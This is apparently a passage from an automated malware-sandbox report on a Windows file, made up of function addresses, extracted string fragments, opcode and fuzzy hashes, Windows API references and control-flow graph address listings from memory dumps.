                              • String ID: 6f$6f$$_q
                              • API String ID: 0-2170083937
                              • Opcode ID: d5132b6de4238da9d22fb6667fe107be73bc1b17c376351f0564e25c6f870ba3
                              • Instruction ID: 36d500b173181cec3f61cb8b0056f17187478f3965c5b1b7eb1a4941aea94b36
                              • Opcode Fuzzy Hash: d5132b6de4238da9d22fb6667fe107be73bc1b17c376351f0564e25c6f870ba3
                              • Instruction Fuzzy Hash: B871E2B4E10209DFDB44CFA9D58959EBFB2FF89300F24852AE416AB354EB345942CF51
                              Function 012C29B0 Relevance: 2.9, Strings: 2, Instructions: 448COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: (o_q$Hcq
                              • API String ID: 0-689770731
                              • Opcode ID: ca616eb4a1101416d72709928717b3b21f43a63f9eb5a4b0eccc6cc941cfed85
                              • Instruction ID: 1546eddd7d6f1f406ae30ad53cb845eb5407f871427ae9586e2f02db7004b627
                              • Opcode Fuzzy Hash: ca616eb4a1101416d72709928717b3b21f43a63f9eb5a4b0eccc6cc941cfed85
                              • Instruction Fuzzy Hash: 4C027D70A1021A8FDB18DF69C854AAEBBF6BF88700F10856CE616DB395DF349D41CB90
                              Function 07B47BE8 Relevance: 2.8, Strings: 2, Instructions: 251COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: Xcq$F
                              • API String ID: 0-2102053600
                              • Opcode ID: 868f85275f817acd4946b3429a78da405158dcf01899744d0eccb085cc9ba503
                              • Instruction ID: 181cd285156d961012577f12dbadc05fd710ed64fe938cb2be9ff0a656d48200
                              • Opcode Fuzzy Hash: 868f85275f817acd4946b3429a78da405158dcf01899744d0eccb085cc9ba503
                              • Instruction Fuzzy Hash: B091C071E10659CFDB14CFA8D8446DDBBF2FF89310F14816AE415AB391EB309942CB91
                              Function 0778C549 Relevance: 2.7, Strings: 2, Instructions: 234COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777134901.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: Te_q$Te_q
                              • API String ID: 0-1615656442
                              • Opcode ID: 682b4550ebd9ca320da51ac8bf9410bd0fcb3de6df6601321dec287fded80779
                              • Instruction ID: 1168a023c65bdfc03a50a197341d931bf72c42c896928fea1b77cf96d0ae9b0e
                              • Opcode Fuzzy Hash: 682b4550ebd9ca320da51ac8bf9410bd0fcb3de6df6601321dec287fded80779
                              • Instruction Fuzzy Hash: E3A116B4E102098FDB48DFA9C884ADEFBB2BF89300F24906AD415BB365D7349905CF60
                              Function 07B4AD00 Relevance: 2.7, Strings: 2, Instructions: 232COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: PH_q$PH_q
                              • API String ID: 0-3760492949
                              • Opcode ID: 732ded885a82c48a96ad5087169f2ee7c7a37770bf50cd3c005d13e81f0abcae
                              • Instruction ID: 58c8d96866df5ba06e67353a60cd00b5100118812aaf9e5fb515af413d15d7f4
                              • Opcode Fuzzy Hash: 732ded885a82c48a96ad5087169f2ee7c7a37770bf50cd3c005d13e81f0abcae
                              • Instruction Fuzzy Hash: 1FA121B0E55208CFDB14CFA9D584A9DFBB2FB89301F20916AE426AB354EB349901CF15
                              Function 0778C588 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777134901.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: Te_q$Te_q
                              • API String ID: 0-1615656442
                              • Opcode ID: 74b16f1e490dc89a58341a86b91e740ad8b329f95cca4c392ff46c67b070dd4a
                              • Instruction ID: b1c2a17b96d39ac549676b9f96da3256156907a886d2204c48bb679ee92edd8a
                              • Opcode Fuzzy Hash: 74b16f1e490dc89a58341a86b91e740ad8b329f95cca4c392ff46c67b070dd4a
                              • Instruction Fuzzy Hash: 7291D4B4E502098FCB48DFAAC88499EFBB2FF89304F24946AD415BB354DB349905CF64
                              Function 07B4335F Relevance: 2.7, Strings: 2, Instructions: 170COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: 6f$$_q
                              • API String ID: 0-708473364
                              • Opcode ID: 765c03517e082326eb8b6e3c78b2e721bf97931eda3d9d920fd2c0aca41876bc
                              • Instruction ID: 6ba636ad6140ba5a90223dd910cd1aaaffc1657c251df4e8b06860b0c7a88f8f
                              • Opcode Fuzzy Hash: 765c03517e082326eb8b6e3c78b2e721bf97931eda3d9d920fd2c0aca41876bc
                              • Instruction Fuzzy Hash: 0B71F2B4E102099FDB44CFA9D59959EBFB2FF89300F24842AE416A7364EB344A42CF51
                              Function 07B4A478 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 07B4A5E3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID: CreateProcessUser
                              • String ID:
                              • API String ID: 2217836671-0
                              • Opcode ID: 0f4f4ea20c9ebe1af236192e30359b3115de21e404cab5f6fbd80d659bfd8cb7
                              • Instruction ID: 8e21f44179698290663b885ff993abd58c98a679f0f8efbf1aae1c4f57ddd620
                              • Opcode Fuzzy Hash: 0f4f4ea20c9ebe1af236192e30359b3115de21e404cab5f6fbd80d659bfd8cb7
                              • Instruction Fuzzy Hash: 5551E7B190022ADFDB24CF59C940BDDBBB5FF48310F0484AAE819B7254DB75AA89DF50
                              Function 012C6C2D Relevance: 1.5, Strings: 1, Instructions: 293COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1760280627.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_12c0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: PH_q
                              • API String ID: 0-2397113591
                              • Opcode ID: 1c8b149c21c6a3042131d834b04b55fa2bfc5c54a8368a8d22de3244de1e8e0a
                              • Instruction ID: 1e872a63bf13c272b0c49061264f104b17847924290b73759323759d3e0da76c
                              • Opcode Fuzzy Hash: 1c8b149c21c6a3042131d834b04b55fa2bfc5c54a8368a8d22de3244de1e8e0a
                              • Instruction Fuzzy Hash: 75A14530B1434A9BD71A9B78C85872A7FE2BF81B10F188A6DD7129F3D6CA7048468751
                              Function 0778E678 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777134901.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: kQD
                              • API String ID: 0-3066535408
                              • Opcode ID: 3c99427af53d1fb19017d3b46a301ad3a66165b1e835845b63def682937b8042
                              • Instruction ID: d0c9f582ae4f1bc8cbe4f224708cd94774f9362f6ed5bef4628df3ed00fee5d2
                              • Opcode Fuzzy Hash: 3c99427af53d1fb19017d3b46a301ad3a66165b1e835845b63def682937b8042
                              • Instruction Fuzzy Hash: 3AC126B4E55209DFCB84DF99C4848AEFBB2FF89340F10C566D415AB214E774A942CF91
                              Function 0778CE10 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777134901.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: >NG
                              • API String ID: 0-1926143806
                              • Opcode ID: 6bec298a88a33bc4209aa61a17c31b178635000d00da12251d8e527d84f5e93c
                              • Instruction ID: ee1940ee6a7aa9b799a678f76228b5d12479b315be3377a1565f9b2d577946c2
                              • Opcode Fuzzy Hash: 6bec298a88a33bc4209aa61a17c31b178635000d00da12251d8e527d84f5e93c
                              • Instruction Fuzzy Hash: C15136B0E152098FDB48DFA9C5456AEFBF2BF89300F24C16AD419B7254E7349A41CFA4
                              Function 07788558 Relevance: 1.4, Instructions: 1392COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777134901.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: de6c2ffb76ebc39930f8fa644ede0a1cd126216d8eed52362bbfb1d573c64f66
                              • Instruction ID: 55ab4bf3402d2a04af1b41fcde1ca3faaa7cfe930942210123c2105622ae7aca
                              • Opcode Fuzzy Hash: de6c2ffb76ebc39930f8fa644ede0a1cd126216d8eed52362bbfb1d573c64f66
                              • Instruction Fuzzy Hash: 1CC29070E102299BCB54FFB8D8957ADB7B6BB88304F4085A9D48DA7340DE38AD45CF52
                              Function 0778CE00 Relevance: 1.4, Strings: 1, Instructions: 142COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777134901.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: >NG
                              • API String ID: 0-1926143806
                              • Opcode ID: 85b08aac0deeb632d24da30929f58b74dc5662cb6b39334841569680d6480bed
                              • Instruction ID: 8e7ef931ff2633a8f1affc035469416ef2e7092c8d0bcfcd2832a6a60cc08b3d
                              • Opcode Fuzzy Hash: 85b08aac0deeb632d24da30929f58b74dc5662cb6b39334841569680d6480bed
                              • Instruction Fuzzy Hash: 9D5168B0E152098FCB49CFA9C5456AEFBF2AF89340F24C1AAD419B7355D7348941CFA4
                              Function 0778A8E0 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777134901.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: <
                              • API String ID: 0-4251816714
                              • Opcode ID: d681773bf3b7d806af349b4fa8e385c57fffa6974e40f1a4f5d628ebfe04800d
                              • Instruction ID: b8c015e43556f5e1142dc286e4f067070deec8345ac7f05951d136d30c25f152
                              • Opcode Fuzzy Hash: d681773bf3b7d806af349b4fa8e385c57fffa6974e40f1a4f5d628ebfe04800d
                              • Instruction Fuzzy Hash: 835176B5E01618CFDB58DFAAC9446DDBBF2AFC9301F14C0AA9409AB224DB345A85CF40
                              Function 0778A8D0 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777134901.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: <
                              • API String ID: 0-4251816714
                              • Opcode ID: 974a6011a9583a3c8a4be453607215fce3446bfedb0f281d2d36ae58a7d4c59f
                              • Instruction ID: ae2b7f73e71568e4c282b8fd2f10e96c6bd061e8419accc1bf396e8b48585443
                              • Opcode Fuzzy Hash: 974a6011a9583a3c8a4be453607215fce3446bfedb0f281d2d36ae58a7d4c59f
                              • Instruction Fuzzy Hash: 715195B5E01658CFDB58CFAAC9446DDBBF2BF89301F14C0AAD409AB264DB345A85CF40
                              Function 0778B978 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777134901.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: S"@k^
                              • API String ID: 0-1081296567
                              • Opcode ID: 1f9ba420d250639ac55b221e1a5ab68b0eeb419aa2660f34da7609ecfb0ef00a
                              • Instruction ID: 3010f7f603fa5c3e77b133ccfafa8895ea0c84cfaa7c9af8fb8feca63483639b
                              • Opcode Fuzzy Hash: 1f9ba420d250639ac55b221e1a5ab68b0eeb419aa2660f34da7609ecfb0ef00a
                              • Instruction Fuzzy Hash: 5131BBB5E006198BEB58DFABD84479EBBF3AFC8200F14C0AAD50DB7264DB3059458F61
                              Function 07B455A0 Relevance: .3, Instructions: 319COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e06e4418af63f40bcc066d297bd9de327f3ce9ab5a79ca759f29c61f47716bfb
                              • Instruction ID: 925cb8077bb1afeb7f98e175d100e6c7e4332e3d5f1156471bb3fdcf8ce6fcc9
                              • Opcode Fuzzy Hash: e06e4418af63f40bcc066d297bd9de327f3ce9ab5a79ca759f29c61f47716bfb
                              • Instruction Fuzzy Hash: E5E1F770A116698FDB64CF69C94479DBBB6FF89200F1085EAD40EAB254EB349E95CF00
                              Function 07B45590 Relevance: .3, Instructions: 282COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 44a819a9f0a8ccd7ca31817a1ffc21b5b52ab90b156c67a44da75779f9e2f6c1
                              • Instruction ID: 4218781c3c23c1fc9f88459e631ba9241da0addda4a7fc12fe87ff2779d0adf7
                              • Opcode Fuzzy Hash: 44a819a9f0a8ccd7ca31817a1ffc21b5b52ab90b156c67a44da75779f9e2f6c1
                              • Instruction Fuzzy Hash: 17D1087091166A8FDB65CF69C94479DFBB6FF88200F1085EAD40EAB254EB349E95CF00
                              Function 05811C00 Relevance: .2, Instructions: 249COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1775188451.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5810000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 01187301f7ca6f38ac7b2074c82312ce199cb19ca0c21e99ea653607788531f3
                              • Instruction ID: 27d8bcc640a2c81e8b84489307287e61e0020f9bf7c9b068b98633ce94079efd
                              • Opcode Fuzzy Hash: 01187301f7ca6f38ac7b2074c82312ce199cb19ca0c21e99ea653607788531f3
                              • Instruction Fuzzy Hash: 14A18075E1031ACFCB04DFA0D8889DDFBBAFF89314F148615E91AAB260DB30A945DB54
                              Function 05811BD0 Relevance: .2, Instructions: 236COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1775188451.0000000005810000.00000040.00000800.00020000.00000000.sdmp, Offset: 05810000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5810000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 681e19f347e2c03a4d26a5edd1e30ffdc00bf625fab0eb9639393178b43ea6d2
                              • Instruction ID: 47e2107fa5ff164b9439cfe40624b340fb240c2ad9cf45d56b436d79499e463e
                              • Opcode Fuzzy Hash: 681e19f347e2c03a4d26a5edd1e30ffdc00bf625fab0eb9639393178b43ea6d2
                              • Instruction Fuzzy Hash: 3091B475E1035A9FCB01DFB0D8489DDFBBAFF89310B158215E91AAF2A0EB309945DB50
                              Function 07B44D88 Relevance: .2, Instructions: 159COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 09001910013fdafe5b928b0c409b528bb2d28fe1651a75de8a850d7e33dc7e1f
                              • Instruction ID: 5b27f32741da48e494f09b0efc53cb53b40ce9587832736675b7e6fd571ee14c
                              • Opcode Fuzzy Hash: 09001910013fdafe5b928b0c409b528bb2d28fe1651a75de8a850d7e33dc7e1f
                              • Instruction Fuzzy Hash: 896156B4D10259DFEB44CFA8D948AAEBBB1FF49301F20846AE416AB350DB744A11DF51
                              Function 07B44D79 Relevance: .2, Instructions: 155COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7de29f908cb49bf7f3d6f11457c5e25b7646ad258805294a5eb82f332db294a3
                              • Instruction ID: a97392ef42016d3ab96f6cd20c5f5528893834c428574c08af332fedf6c2f010
                              • Opcode Fuzzy Hash: 7de29f908cb49bf7f3d6f11457c5e25b7646ad258805294a5eb82f332db294a3
                              • Instruction Fuzzy Hash: C16168B4D10259DFEB48CFA4D9487AEBBB1FF8A301F20846AD416A7390DB748A11DF51
                              Function 0778D7D8 Relevance: .1, Instructions: 119COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777134901.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0e64dd746b73008f439da8c4dbf9a537b7ce95afb941b9c1d79963b62ca1c31f
                              • Instruction ID: d769e36de2c5024a13663cf6bf0440297fffe738d3242a38866d4393470f642b
                              • Opcode Fuzzy Hash: 0e64dd746b73008f439da8c4dbf9a537b7ce95afb941b9c1d79963b62ca1c31f
                              • Instruction Fuzzy Hash: 8B5109B0E11218CFDB64DF6AC8846DDBBB2FF89310F1084A9D409AB354DB346A85CF50
                              Function 0778D7C8 Relevance: .1, Instructions: 104COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777134901.0000000007780000.00000040.00000800.00020000.00000000.sdmp, Offset: 07780000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7780000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4859fa385e57930b16d544cc109ed51d606770ca6c766e89dfc957712cab6d81
                              • Instruction ID: 3525382a1fb8f3ceb4eaf19dad05e1bda66a693663409e3991df89a6cb2baf73
                              • Opcode Fuzzy Hash: 4859fa385e57930b16d544cc109ed51d606770ca6c766e89dfc957712cab6d81
                              • Instruction Fuzzy Hash: 5D4129B0E116588FDB58DFAAC9846DEBBF2BF88300F14C4AAD405AB354DB345A85CF50
                              Function 07B49378 Relevance: .1, Instructions: 97COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7b2f97388389b3f842f23f0906f566d5168ffefd08f72344c4d9ae0f20d86653
                              • Instruction ID: c870d24bd3e3ccf442c3f14b259134eaa14759370aeb806b71ba1544e78f87e1
                              • Opcode Fuzzy Hash: 7b2f97388389b3f842f23f0906f566d5168ffefd08f72344c4d9ae0f20d86653
                              • Instruction Fuzzy Hash: 2341E5B4E002188BEB58CFAAC8446DEFBF2BF89310F14C0AAD448A7314EB705985CF50
                              Function 07B40040 Relevance: .1, Instructions: 65COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1777381011.0000000007B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B40000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b40000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9c6e6d406ac9eca0b9a0cb34d8ad685356a266936f4598330f7bec40eab9c4d7
                              • Instruction ID: 07bddcb2b1cde2128c535fe676deb25ff926861af7ffc3819fdd86e7771557db
                              • Opcode Fuzzy Hash: 9c6e6d406ac9eca0b9a0cb34d8ad685356a266936f4598330f7bec40eab9c4d7
                              • Instruction Fuzzy Hash: 3521CDB1E016188BEB58DF6BDD4469EFBF7AFC8200F04C1BAD508B6264EB341A558F51
                              Function 0575D328 Relevance: 6.1, APIs: 4, Instructions: 134threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1459 575d328-575d3c7 GetCurrentProcess 1464 575d3d0-575d404 GetCurrentThread 1459->1464 1465 575d3c9-575d3cf 1459->1465 1466 575d406-575d40c 1464->1466 1467 575d40d-575d441 GetCurrentProcess 1464->1467 1465->1464 1466->1467 1469 575d443-575d449 1467->1469 1470 575d44a-575d462 1467->1470 1469->1470 1481 575d465 call 575d518 1470->1481 1482 575d465 call 575d508 1470->1482 1473 575d46b-575d49a GetCurrentThreadId 1474 575d4a3-575d505 1473->1474 1475 575d49c-575d4a2 1473->1475 1475->1474 1481->1473 1482->1473
                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 0575D3B6
                              • GetCurrentThread.KERNEL32 ref: 0575D3F3
                              • GetCurrentProcess.KERNEL32 ref: 0575D430
                              • GetCurrentThreadId.KERNEL32 ref: 0575D489
                              Memory Dump Source
                              • Source File: 00000000.00000002.1774812422.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5750000_file.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: e351bf279f5db9769158d9500324574f5c1ed212ae4d73115315f6c417cddea0
                              • Instruction ID: 88984ac348d52e128a4c8b427753c95de10a54da0dcd2fc2ec8363b0f1f1a972
                              • Opcode Fuzzy Hash: e351bf279f5db9769158d9500324574f5c1ed212ae4d73115315f6c417cddea0
                              • Instruction Fuzzy Hash: 045168B09013099FDB14CFAAD548B9EBBF1FF48314F208029E919A7360DB74A985CB65
                              Function 0575D338 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1483 575d338-575d3c7 GetCurrentProcess 1487 575d3d0-575d404 GetCurrentThread 1483->1487 1488 575d3c9-575d3cf 1483->1488 1489 575d406-575d40c 1487->1489 1490 575d40d-575d441 GetCurrentProcess 1487->1490 1488->1487 1489->1490 1492 575d443-575d449 1490->1492 1493 575d44a-575d462 1490->1493 1492->1493 1504 575d465 call 575d518 1493->1504 1505 575d465 call 575d508 1493->1505 1496 575d46b-575d49a GetCurrentThreadId 1497 575d4a3-575d505 1496->1497 1498 575d49c-575d4a2 1496->1498 1498->1497 1504->1496 1505->1496
                              APIs
                              • GetCurrentProcess.KERNEL32 ref: 0575D3B6
                              • GetCurrentThread.KERNEL32 ref: 0575D3F3
                              • GetCurrentProcess.KERNEL32 ref: 0575D430
                              • GetCurrentThreadId.KERNEL32 ref: 0575D489
                              Memory Dump Source
                              • Source File: 00000000.00000002.1774812422.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_5750000_file.jbxd
                              Similarity
                              • API ID: Current$ProcessThread
                              • String ID:
                              • API String ID: 2063062207-0
                              • Opcode ID: dfbb1ecd89e6ebd3995fe483b092569ac66624371ca676af393c7894697c9651
                              • Instruction ID: d0b2c6444fa854b0d28be3170cb4fb9fc776631ed5e8cbb357b37179f5e56b67
                              • Opcode Fuzzy Hash: dfbb1ecd89e6ebd3995fe483b092569ac66624371ca676af393c7894697c9651
                              • Instruction Fuzzy Hash: 825166B09013098FDB14CFAAD548B9EBBF1EF88314F208029E919A7260DB74A944CB65
                              Function 076D1660 Relevance: 4.0, Strings: 3, Instructions: 246COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 5660 76d1660-76d1685 5661 76d17d9-76d17fe 5660->5661 5662 76d168b-76d168d 5660->5662 5663 76d1805-76d186b 5661->5663 5662->5663 5664 76d1693-76d169c 5662->5664 5694 76d186d-76d1876 5663->5694 5695 76d1877-76d194c 5663->5695 5666 76d16af-76d16d6 5664->5666 5667 76d169e-76d16ac 5664->5667 5670 76d16dc-76d16ee call 76d0fa0 5666->5670 5671 76d175f-76d1763 5666->5671 5667->5666 5670->5671 5687 76d16f0-76d1743 5670->5687 5672 76d179a-76d17b3 5671->5672 5673 76d1765-76d1790 5671->5673 5681 76d17bd 5672->5681 5682 76d17b5 5672->5682 5712 76d1792 call 76d17d8 5673->5712 5713 76d1792 call 76d17c0 5673->5713 5714 76d1792 call 76d1660 5673->5714 5715 76d1792 call 76d1650 5673->5715 5716 76d1792 call 76d18c0 5673->5716 5681->5661 5682->5681 5687->5671 5691 76d1745-76d1758 5687->5691 5690 76d1797 5690->5672 5691->5671 5702 76d1952-76d1960 5695->5702 5703 76d1969-76d19a1 5702->5703 5704 76d1962-76d1968 5702->5704 5708 76d19b1 5703->5708 5709 76d19a3-76d19a7 5703->5709 5704->5703 5711 76d19b2 5708->5711 5709->5708 5710 76d19a9 5709->5710 5710->5708 5711->5711 5712->5690 5713->5690 5714->5690 5715->5690 5716->5690
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: (cq$(cq$(cq
                              • API String ID: 0-33047009
                              • Opcode ID: 2088a6ac7c4f1a2f0d47839106cb5d111139f2c381785671e814e903a57c6bc1
                              • Instruction ID: 7290c9b1049231f0562f12781fab4116588d99bbf28bad29d32ba18dcad003f3
                              • Opcode Fuzzy Hash: 2088a6ac7c4f1a2f0d47839106cb5d111139f2c381785671e814e903a57c6bc1
                              • Instruction Fuzzy Hash: A9A18DB1E102099FDB19DFA9C45469EBBF2FF89310F158569D80ABB360DB709C41CB91
                              Function 076D2C94 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1776920335.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_76d0000_file.jbxd
                              Similarity
                              • API ID:
                              • String ID: @$TJdq$Te_q
                              • API String ID: 0-4144917423
                              • Opcode ID: a573016994b349bb4887923eba9a4cd822c4b6975929fb9f85f18a0ac56877e8
                              • Instruction ID: 6b5366da7397621fdd4484d93216331d6f6a8e1769176346213345049b0ac136
                              • Opcode Fuzzy Hash: a573016994b349bb4887923eba9a4cd822c4b6975929fb9f85f18a0ac56877e8
                              • Instruction Fuzzy Hash: EA4186A161E3D10FD7075738983465A7FB2AF87118B1E01DBC186CF6E3D9194C0A83A6
